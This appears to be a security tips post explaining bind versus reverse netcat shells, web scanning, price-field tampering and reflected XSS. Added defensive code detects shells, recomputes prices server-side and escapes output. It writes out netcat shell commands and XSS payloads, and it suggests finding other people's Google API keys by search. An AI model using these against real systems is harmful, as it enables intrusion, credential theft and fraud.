A few important links and pieces of information
The free version of netstalker is now in the lab.
WebGoat is a deliberately vulnerable server created and maintained by OWASP; it contains the latest vulnerabilities, which security professionals can try out. The link below contains walkthroughs of these vulnerabilities and challenges:
http://yehg.org/lab/pr0js/training/webgoat.php
The difference between a bind shell and a reverse bind shell:
Ever notice that in the Metasploit framework there are two types of payloads (bind/normal and reverse)?
You can bind an application to a particular port, for example: nc -lvvp 666 -e cmd.exe
This command means cmd.exe is now bound to port 666: anyone connecting to port 666 will get the cmd input/output.
On the other hand, if you are behind a NAT this becomes a problem, because inbound connections to that port never reach the machine (and that's where the reverse bind shell comes in).
First let netcat listen on a particular port: nc -lvvp 666
Then, from the target, connect to that port but “throw” the cmd command shell to it: nc -v "ip address" 666 -e cmd.exe
As it is an outbound connection, it will go through the NAT.
What happens here is basically what happens during a client-side attack: a hacker sends a reverse shell from the target machine to his listening server. How he gets it there is another question; he can use trojans, worms, or buffer-overflow exploits. It is essentially a backdoor-type payload. Some reverse shells even use IE (the PassiveX payload), so it looks as if you are just surfing the web.
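The direction difference described above is also what a defender can look for. The following is an added example, not code from the original post or from Metasploit: it takes a constructed snapshot of sockets joined with their owning process (the kind of view `netstat -ano` plus a process list gives) and labels a listening or accepted-inbound socket held by a shell or netcat-style relay as a bind-shell candidate, and an outbound one as a reverse-shell candidate. The process names, addresses and the `SocketRecord` shape are assumptions for the example.

```python
"""Spot bind-shell vs reverse-shell patterns in a snapshot of sockets.

Constructed example (not from the original post): each SocketRecord mimics one
line of a process-aware socket listing. The direction test is the one the post
explains: a bind shell LISTENs and accepts inbound connections, a reverse shell
makes an outbound one (and so crosses NAT).
"""
from dataclasses import dataclass

# Shells rarely own a network socket themselves; when they do, look closer.
SHELL_PROCESSES = {"cmd.exe", "powershell.exe", "sh", "bash", "dash", "zsh"}
# Relay tools that attach a shell to a socket, as in the post's `nc ... -e cmd.exe`.
RELAY_PROCESSES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}


@dataclass(frozen=True)
class SocketRecord:
    pid: int
    process: str      # image name owning the socket
    parent: str       # image name of the parent process
    local: str        # "ip:port"
    remote: str       # "ip:port", or "*:*" for a listening socket
    state: str        # "LISTEN" or "ESTABLISHED"


def _port(addr: str) -> str:
    return addr.rsplit(":", 1)[1]


def is_suspicious_process(rec: SocketRecord) -> bool:
    """A shell holding a socket, or a netcat-style relay as the process or its parent."""
    names = {rec.process.lower(), rec.parent.lower()}
    return bool(names & SHELL_PROCESSES) or bool(names & RELAY_PROCESSES)


def classify_snapshot(records):
    """Return [(pid, label)] for records that look like a bind or reverse shell.

    A LISTEN socket, or an ESTABLISHED socket whose local port is also being
    listened on in the same snapshot, is inbound (bind shell). An ESTABLISHED
    socket on a port nobody listens on was dialled out by the host (reverse shell).
    """
    listening_ports = {_port(r.local) for r in records if r.state == "LISTEN"}
    findings = []
    for r in records:
        if not is_suspicious_process(r):
            continue
        if r.state == "LISTEN":
            findings.append((r.pid, "bind-shell-candidate: listening"))
        elif r.state == "ESTABLISHED":
            if _port(r.local) in listening_ports:
                findings.append((r.pid, "bind-shell-candidate: accepted inbound"))
            else:
                findings.append((r.pid, "reverse-shell-candidate: outbound"))
    return findings


# Constructed snapshot; addresses are from documentation/private ranges, not real hosts.
SAMPLE_SNAPSHOT = [
    SocketRecord(4012, "nc.exe", "explorer.exe", "0.0.0.0:666", "*:*", "LISTEN"),
    SocketRecord(4012, "nc.exe", "explorer.exe", "10.0.0.5:666", "10.0.0.9:50213", "ESTABLISHED"),
    # cmd.exe holding a socket inherited from the relay, dialled out to port 666.
    SocketRecord(5120, "cmd.exe", "nc.exe", "10.0.0.5:49812", "203.0.113.7:666", "ESTABLISHED"),
    SocketRecord(880, "svchost.exe", "services.exe", "0.0.0.0:135", "*:*", "LISTEN"),
    SocketRecord(2200, "chrome.exe", "explorer.exe", "10.0.0.5:49900", "198.51.100.20:443", "ESTABLISHED"),
]

if __name__ == "__main__":
    for pid, label in classify_snapshot(SAMPLE_SNAPSHOT):
        print(pid, label)
```

This is a heuristic, not a signature: an administrator legitimately using ncat will trip it, and a payload that copies itself under another image name will not. Its value is the direction check, which tells you whether to hunt for an exposed listener or for whatever made the host dial out.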
Web scanning. Some tools like Wikto can scan your site against the whole Google hacks database; for that you need a Google API key. If you are lazy you can find one through Google: simply put “google.license_key” into Google and you can find someone’s API key.
There are many sites, such as langalaxy, which do not have proper input validation, so tools such as Tamper Data for Firefox or Burp Proxy can be used to manipulate the price (and other) fields in order to change the value on the server.
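The fix for the price-field problem is server-side: the price the browser sends back is never trusted, the server recomputes it from its own catalogue. The following is an added example, not code from the original post or from any site named there; the request shape, the catalogue, the SKUs and the quantity limit are all assumptions.

```python
"""Price fields must be recomputed on the server, never read back from the client.

Constructed example (not from the original post): the request shape, the
catalogue and the SKUs are all assumptions.
"""
from decimal import Decimal, InvalidOperation

# Server-side source of truth for prices (constructed values).
CATALOG = {
    "sku-100": Decimal("19.99"),
    "sku-200": Decimal("249.00"),
}

MAX_QTY = 100


def price_order(request: dict, catalog=CATALOG):
    """Return (total, warnings).

    The client may send a 'price' per item (the field a proxy lets a user edit
    before it reaches the server). It is compared for logging only; the total
    is always computed from the catalogue.
    """
    total = Decimal("0")
    warnings = []
    for item in request.get("items", []):
        sku = item.get("sku")
        if sku not in catalog:
            raise ValueError(f"unknown sku: {sku!r}")
        try:
            qty = int(item.get("qty", 0))
        except (TypeError, ValueError):
            raise ValueError(f"bad qty for {sku}") from None
        if not 1 <= qty <= MAX_QTY:
            raise ValueError(f"qty out of range for {sku}: {qty}")
        server_price = catalog[sku]
        if "price" in item:
            try:
                client_price = Decimal(str(item["price"]))
            except InvalidOperation:
                client_price = None
            if client_price != server_price:
                warnings.append(
                    f"{sku}: client sent price {item['price']!r}, server price is {server_price}"
                )
        total += server_price * qty
    return total, warnings


# Constructed request in which the client lowered the price of sku-200 to 1.00.
TAMPERED_REQUEST = {
    "items": [
        {"sku": "sku-100", "qty": 2, "price": "19.99"},
        {"sku": "sku-200", "qty": 1, "price": "1.00"},
    ]
}

if __name__ == "__main__":
    total, warnings = price_order(TAMPERED_REQUEST)
    print("charged:", total)  # 288.98, not the 40.98 the client asked for
    for w in warnings:
        print("tamper warning:", w)
```

The same rule applies to every field the client has no business deciding (discounts, quantity ceilings, user ids): accept it as a hint, recompute it, and log the mismatch, since a mismatch on the price field is a good signal that someone is sitting behind a proxy editing requests.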
XSS, or cross-site scripting, is a pain of a vulnerability. Essentially the concept is very simple: if a web server accepts JavaScript or other mobile code and reflects it into a page, that script runs at the client. It can be input in a URL or in any field on a site, for example:
http://yehg.org/lab/pr0js/files.php/webgoat_xsslab_stage1.zip
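To show the bug and its fix side by side, here is an added example, not code from the original post or from WebGoat: the unsafe rendering reflects the parameter straight into the page, the hardened versions HTML-escape it for the context it lands in. The page templates, the parameter name and the sample input are assumptions for the example.

```python
"""Reflected XSS: the unsafe rendering beside the hardened one.

Constructed example, not code from the original post or WebGoat. The page
templates and the parameter name 'name' are assumptions.
"""
import html


def render_unsafe(name: str) -> str:
    """Reflects the parameter straight into the page: this is the XSS bug."""
    return "<p>Hello " + name + "</p>"


def render_safe(name: str) -> str:
    """HTML-escapes for element-content context before reflecting."""
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"


def render_attr_safe(name: str) -> str:
    """Attribute context: escape (quotes included) AND keep the attribute quoted."""
    return '<input type="text" name="name" value="' + html.escape(name, quote=True) + '">'


# Constructed input of the kind the post describes arriving in a URL or form field.
SAMPLE_INPUT = "<script>alert(1)</script>"
# Constructed input aimed at breaking out of an attribute value.
SAMPLE_ATTR_INPUT = '" onmouseover="alert(1)'

if __name__ == "__main__":
    print(render_unsafe(SAMPLE_INPUT))       # live <script> tag reaches the browser
    print(render_safe(SAMPLE_INPUT))         # &lt;script&gt; renders as text
    print(render_attr_safe(SAMPLE_ATTR_INPUT))
```

Escaping is an output-side fix and has to match the context the value is written into: `html.escape` is right for element content and quoted attributes, but a value dropped into a URL, a `<script>` block or a CSS rule needs that context's own encoder, and input validation on its own does not cover any of these.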